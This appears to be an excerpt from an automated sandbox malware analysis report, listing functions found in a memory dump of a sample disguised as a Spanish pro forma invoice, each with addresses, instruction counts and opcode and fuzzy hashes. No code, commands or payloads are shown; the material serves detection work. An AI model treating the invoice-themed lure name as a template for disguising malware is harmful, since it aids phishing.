                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c27d376b5f44393bba457c958bfd0b90fe7095c36a6e53fc6f5a1fd4e3d18f89
                                                  • Instruction ID: 95919d76d715e540979961cd6f507f1495fe3a18dcc82cec4942666e6dc78d20
                                                  • Opcode Fuzzy Hash: c27d376b5f44393bba457c958bfd0b90fe7095c36a6e53fc6f5a1fd4e3d18f89
                                                  • Instruction Fuzzy Hash: 5922B074E202168FDB09CF99C490ABABBB2BF89354FA4816DD855DF344DB31A941CB90
                                                  Function 36728347 Relevance: .4, Instructions: 380COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de3dcafbb53ddbb832418abde932538ed38243f14e4675ac2fad50bf503fffba
                                                  • Instruction ID: 053dc9e0cba6d8f6b085021dc36925eeb482a9745070b9f9361cc2f3317a564b
                                                  • Opcode Fuzzy Hash: de3dcafbb53ddbb832418abde932538ed38243f14e4675ac2fad50bf503fffba
                                                  • Instruction Fuzzy Hash: 3ED1DD71A003168FEB04CF65CC85ABE73B6EF44748F948129E925DF281EB35E949CB91
                                                  Function 3673D700 Relevance: .3, Instructions: 342COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b231f116abd42b252b86e894727935a2b14e4c86228bf16868d070ceb93c0247
                                                  • Instruction ID: c75eb9e1f361ec87479a937839f58e63b9f021cd5139d23d91e39b9af6a4b194
                                                  • Opcode Fuzzy Hash: b231f116abd42b252b86e894727935a2b14e4c86228bf16868d070ceb93c0247
                                                  • Instruction Fuzzy Hash: 81C1A075E112159BEB14CF59C840BEEB7F3EB44328FA48269E924AF281D730E941CBC1
                                                  Function 36771763 Relevance: .3, Instructions: 322COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20741874d724894ee136e3dc17424ff4a54d430b647c66dec99646d37f38e15
                                                  • Instruction ID: b856d602a991f73c33b14e418f2e2d366e1ad76cef9294ea85a0bed460a10800
                                                  • Opcode Fuzzy Hash: f20741874d724894ee136e3dc17424ff4a54d430b647c66dec99646d37f38e15
                                                  • Instruction Fuzzy Hash: B4D115B5910704DFEB41CF69C984BA67BE9BF09344F9441BAEE099F216DB30D905CBA0
                                                  Function 3674F380 Relevance: .3, Instructions: 321COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93fd42122b3350479042c71a740b83e06e473a68cb211225ebff0554c58d87d2
                                                  • Instruction ID: 4b5404bcf0bd5fd3a120c4b18bff585643880c9e40997e9cfae26f77cd2ad287
                                                  • Opcode Fuzzy Hash: 93fd42122b3350479042c71a740b83e06e473a68cb211225ebff0554c58d87d2
                                                  • Instruction Fuzzy Hash: 7AC12775E002208BEB06DF1DC498779B7A2FBC8B44FD58199D9459F391DB388D92CBA0
                                                  Function 367337E4 Relevance: .3, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 264da70621fd6123a416ea9918118d9c7f4d5097070435721452c83e27898673
                                                  • Instruction ID: 8331b476d1c9af6974ac627ff5636daf07819b18990286485e35f4cb9d6137a4
                                                  • Opcode Fuzzy Hash: 264da70621fd6123a416ea9918118d9c7f4d5097070435721452c83e27898673
                                                  • Instruction Fuzzy Hash: CEC167B1901644DFDB25CFA9C880AADBBF5FF48754FA4802AE506AB351DB349901CF90
                                                  Function 36740445 Relevance: .3, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                  • Instruction ID: 1767f6d7ee5c8c9dbe417e9829316284305beb01cd4113ebe05c8ed5ea168c43
                                                  • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                  • Instruction Fuzzy Hash: 5EB15535A00715AFEB16CBA5C898BBEBBF6EF84344FA04158D6519F385DB30D940CBA1
                                                  Function 367382E0 Relevance: .3, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c35cfbb4002eddb3d0fb148ab3e3667cd00db91346eaf0a61b2ae6e9c2bc87ee
                                                  • Instruction ID: aa8d48907ec1ab319966c7db28755eb167f43481da94617bc2f04f4978f2b19f
                                                  • Opcode Fuzzy Hash: c35cfbb4002eddb3d0fb148ab3e3667cd00db91346eaf0a61b2ae6e9c2bc87ee
                                                  • Instruction Fuzzy Hash: 2AC14774609340CFE360CF15C494BAABBE5BF88344F90496DE9998B791D774E908CF92
                                                  Function 3672C3C7 Relevance: .3, Instructions: 280COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f95d285e6e8feabf36dd5e8c30333d25c5ee8e284372938e20e570a6cccb548e
                                                  • Instruction ID: a653ef48e22138add0782c760d64d566016d9b4f12d9fdb9809d03e624d5efa6
                                                  • Opcode Fuzzy Hash: f95d285e6e8feabf36dd5e8c30333d25c5ee8e284372938e20e570a6cccb548e
                                                  • Instruction Fuzzy Hash: 9AB19174A002658FEB64CF55CC80BA9B3B2EF55344F9085EAD50AAB240EB71DEC5CF61
                                                  Function 367700A5 Relevance: .3, Instructions: 276COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dab91da5c2b8ead2201903ecf7f37ab2719d831078ae8b48d9e84bf7f2913434
                                                  • Instruction ID: b9203379d220eec057dcf26cbc6d3a821e27e56c806f4de758cf97cf53c9d0a0
                                                  • Opcode Fuzzy Hash: dab91da5c2b8ead2201903ecf7f37ab2719d831078ae8b48d9e84bf7f2913434
                                                  • Instruction Fuzzy Hash: 74A1BDB5A11716DFEB14CF65C980BBAB7B2FF44358F904129EA159F280EB34E815CB90
                                                  Function 36804080 Relevance: .3, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 668ccd1a2ec6ed4e8146ca1f2777a69afbcc091f40eed7ae8abf0bc49dfe3cd7
                                                  • Instruction ID: edc9e6bba26f27ebf58dd4c74b8e12938a0230c51e6392583335304663f285c6
                                                  • Opcode Fuzzy Hash: 668ccd1a2ec6ed4e8146ca1f2777a69afbcc091f40eed7ae8abf0bc49dfe3cd7
                                                  • Instruction Fuzzy Hash: 4FA1CAB2A54601EFE312CF24CD84B0AB7E9FF4C744F914928E689AB651C734E851CFA1
                                                  Function 3674E310 Relevance: .3, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c32fd130eb5b28de795349af9151b1ad834597fc41905de62923c228641d697a
                                                  • Instruction ID: 1a4bae84d93eb6c9bcdf9c69a8668d536154d8e39febc5842bf830da48c0a573
                                                  • Opcode Fuzzy Hash: c32fd130eb5b28de795349af9151b1ad834597fc41905de62923c228641d697a
                                                  • Instruction Fuzzy Hash: E1913775E106208BF712AF69D888BBD77E2EF847A4FD580A5E9009F350DB349941CB91
                                                  Function 367393A6 Relevance: .3, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bed6715b46fb3e810fbd0611f9407a21be17dad30b9c21156936c0dcf1ba99ad
                                                  • Instruction ID: 7723ad0cc7909562aa74f26d6dfa4eac51dbfcf94771d010581d8fa4b24bc1e3
                                                  • Opcode Fuzzy Hash: bed6715b46fb3e810fbd0611f9407a21be17dad30b9c21156936c0dcf1ba99ad
                                                  • Instruction Fuzzy Hash: FFB12CB9D01305CFEB14DF19D4407AA77E2BB48358FB08559D921AF292EB75D882CBE0
                                                  Function 36737290 Relevance: .2, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f1c0f2fb3098f6552ae1f95faea235ba4d29d5283c6922f9399948c7225cc8a
                                                  • Instruction ID: 73db3e0b14bf90e6a274fe0d4bd0f5f73babdcbaf4e2607300383e509f2d7cf0
                                                  • Opcode Fuzzy Hash: 4f1c0f2fb3098f6552ae1f95faea235ba4d29d5283c6922f9399948c7225cc8a
                                                  • Instruction Fuzzy Hash: 3EA17B75A09341CFE304CF28C484A6ABBF6BF88744F60896DE5949B351EB30E945CF96
                                                  Function 367FA6C0 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                  • Instruction ID: 2a938c0bf676ba036de2fa56ba682b7a6d009f78af1124815a85d75a9b50f755
                                                  • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                  • Instruction Fuzzy Hash: 3F818F75A20219CFDF09CF59C880EAEB7B2BF84710F948169D9159F344DBB5EA02CB90
                                                  Function 367EB0AF Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                  • Instruction ID: 58b5a1e0bd4b1575a715c0f97fe640dc69c9223cfd6fc4f3b1e0dfbf0c732a9e
                                                  • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                  • Instruction Fuzzy Hash: BF71C775E022168BDB00CFA5CA896BFBBBAEF44B94FE5415AD800DF240E734D949C790
                                                  Function 367F970B Relevance: .2, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f21303845b0d33e85e78160f5d5da7932166c48fd4b90106ec29f5bd372ef2c2
                                                  • Instruction ID: d65fd9a7a88c0f1a0fc97be51ec3332cc5210e7c270e958b7f87a26af2b913c0
                                                  • Opcode Fuzzy Hash: f21303845b0d33e85e78160f5d5da7932166c48fd4b90106ec29f5bd372ef2c2
                                                  • Instruction Fuzzy Hash: 63618074E202159BEB15CE6ACC84FBE77ABAF84354F908119E811AF394DB32D941C7A1
                                                  Function 3674C560 Relevance: .2, Instructions: 206COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a6268c9c2f672fcc5122ca817f32725a6aeab6c6e12584aa30b570cbedd19b6
                                                  • Instruction ID: e167e593a2694b4cd7233d857db16368f1d0f549e9607b4a992e72881891110d
                                                  • Opcode Fuzzy Hash: 3a6268c9c2f672fcc5122ca817f32725a6aeab6c6e12584aa30b570cbedd19b6
                                                  • Instruction Fuzzy Hash: 4671DEB5C05224DBEB12CF59D8907BDBBF1FF4A710F94856AE941AB340E7349851CBA0
                                                  Function 3674252B Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66627a5dede83cca42f20437fda9e9e6358b1d9d4152d9c6e2a2fe2fb2ef33af
                                                  • Instruction ID: bc1109b36a2bc0e38f6c2ffdee1a61b37edbb3c0037e21b8a855d5c0eee056ad
                                                  • Opcode Fuzzy Hash: 66627a5dede83cca42f20437fda9e9e6358b1d9d4152d9c6e2a2fe2fb2ef33af
                                                  • Instruction Fuzzy Hash: 57712735A042518FE302DF28C888B26F7E5FF84344F5485A9E868CF755EB34D895CBA6
                                                  Function 367377F9 Relevance: .2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 951a899e9f6fa76dcc181abb94d7c79f553a89ce4109be0a7dea310e3e590a39
                                                  • Instruction ID: 0145cba748d24ace949c436f191fc38e67557c959ef34f684e92b444edd81423
                                                  • Opcode Fuzzy Hash: 951a899e9f6fa76dcc181abb94d7c79f553a89ce4109be0a7dea310e3e590a39
                                                  • Instruction Fuzzy Hash: 6C519F70A09311CFD310CF29C48496ABBE6FB88754FA08A6EE5949B341D730E844CF96
                                                  Function 3676B490 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09c16d5ffccf4ec5d5b780ffce033c6ec9271147a43b3a0ad5453c837e739b62
                                                  • Instruction ID: 180798e944b740cff462763890505a78a0cfde882ff075556cabe6e7a5df424f
                                                  • Opcode Fuzzy Hash: 09c16d5ffccf4ec5d5b780ffce033c6ec9271147a43b3a0ad5453c837e739b62
                                                  • Instruction Fuzzy Hash: 6B51D2B55003419BE320DF65CC98FAB77E9EB84764F900629EA219B291D734D841CBA6
                                                  Function 3672B273 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9c397096a6d41cd209267a706e2ea2467c72965f37f4582c62a7e24d1b245d2
                                                  • Instruction ID: f18737ad75221f57cc0923eced3aa8c1de3cdb98c26717e0c39a240df034288d
                                                  • Opcode Fuzzy Hash: a9c397096a6d41cd209267a706e2ea2467c72965f37f4582c62a7e24d1b245d2
                                                  • Instruction Fuzzy Hash: 13411A71A407009FD7168F2ADC48B2A77B6FF45B58FA1842AE6589F252DB70DC41CB80
                                                  Function 367AD250 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                  • Instruction ID: 6c74e7fb73f6f7659f34762b5b62d626aa884a697cbd5a21ea3061ba0b1a15ce
                                                  • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                  • Instruction Fuzzy Hash: DC51C4B66003129BDB01DF75CC44A7B77E6AF84694F944929FA84DF350EB34C815C7A2
                                                  Function 367594FA Relevance: .2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e624fc032c224c397d7489057bdaa68d5c60cfd0a725030cc423fd6032e6b458
                                                  • Instruction ID: bd6d7ab0af069afd0885578ccac0caa4eb2788599160cfe5238a068065b1a51e
                                                  • Opcode Fuzzy Hash: e624fc032c224c397d7489057bdaa68d5c60cfd0a725030cc423fd6032e6b458
                                                  • Instruction Fuzzy Hash: 1251BC70D00709AFEB218FA5CC84BEDBBF9EF01344FA04069E6A4AB191EB718954DF11
                                                  Function 36743660 Relevance: .2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67c22b546182f4f40fa8b068e39106d321d49fe8e99ef581e6a692550f308d3b
                                                  • Instruction ID: e3796a0f61079beb2e2265df83f0db5cc7e65f0d37798a40877a4d49f14c7f0f
                                                  • Opcode Fuzzy Hash: 67c22b546182f4f40fa8b068e39106d321d49fe8e99ef581e6a692550f308d3b
                                                  • Instruction Fuzzy Hash: 6251EFB9A14625DFE3029F6AC888669B7B1FF04764BD08254D8989F740E734E991CBD0
                                                  Function 3676E363 Relevance: .2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
